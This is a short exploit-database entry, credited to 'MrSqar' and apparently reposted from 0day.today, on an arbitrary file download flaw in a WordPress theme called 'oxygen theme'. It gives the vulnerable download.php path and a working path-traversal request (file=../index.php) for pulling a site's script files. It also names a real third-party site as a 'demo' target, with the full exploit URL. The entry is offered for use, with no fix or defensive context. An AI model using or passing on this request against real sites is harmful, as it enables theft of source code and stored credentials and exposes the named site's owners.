id: 29594
date: 01/21/2018
title: Wordpress oxygen theme - Arbitrary file download Vulnerability
author: MrSqar
cves: 

-===================足====================足=================-
# Exploit title : Wordpress oxygen theme - Arbitrary file download
# author : MrSqar Yemeni hacker
# Team : IT-Geeks
# Tested on : BackBox linux
# check if site is vulnerabe : /wp-content/themes/oxygen-theme/download.php
you can download any script from the site by this method 
site.com/wp-content/themes/oxygen-theme/download.php?file=../index.php
# deom site :
http://klimatrol.com/wp-content/themes/oxygen-theme/download.php?file=../index.php
 -===================足====================足=================-

#  0day.today [2023-03-25]  #